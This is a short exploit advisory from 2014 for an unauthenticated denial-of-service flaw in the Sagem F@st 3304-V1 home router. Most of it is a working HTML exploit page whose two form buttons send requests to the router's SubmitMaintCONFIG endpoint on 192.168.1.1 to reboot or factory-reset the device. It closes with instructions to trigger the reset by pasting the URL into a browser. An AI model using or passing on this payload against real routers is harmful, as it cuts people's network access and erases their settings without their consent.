27 lines
No EOL
1.1 KiB
Text
27 lines
No EOL
1.1 KiB
Text
# Title : Sagem F@st 3304-V1 denial of service Vulnerability
|
|
# Vendor Homepage : http://www.sagemcom.com
|
|
# Tested on : Firefox, Google Chrome
|
|
# Tested Router : Sagem F@st 3304-V1
|
|
# Date : 2014-07-26
|
|
# Author : Z3ro0ne
|
|
# Contact : saadousfar59@gmail.com
|
|
# Facebook Page : https://www.facebook.com/Z3ro0ne
|
|
|
|
# Vulnerability description :
|
|
the Vulnerability allow unauthenticated users to remotely restart and reset the router
|
|
# Exploit:
|
|
|
|
<html>
|
|
<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
|
|
<body>
|
|
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
|
|
<INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
|
|
</FORM>
|
|
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
|
|
<INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
|
|
</FORM>
|
|
</body>
|
|
</html>
|
|
Reset to factory configuration :
|
|
--- Using Google Chrome browser :
|
|
to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar |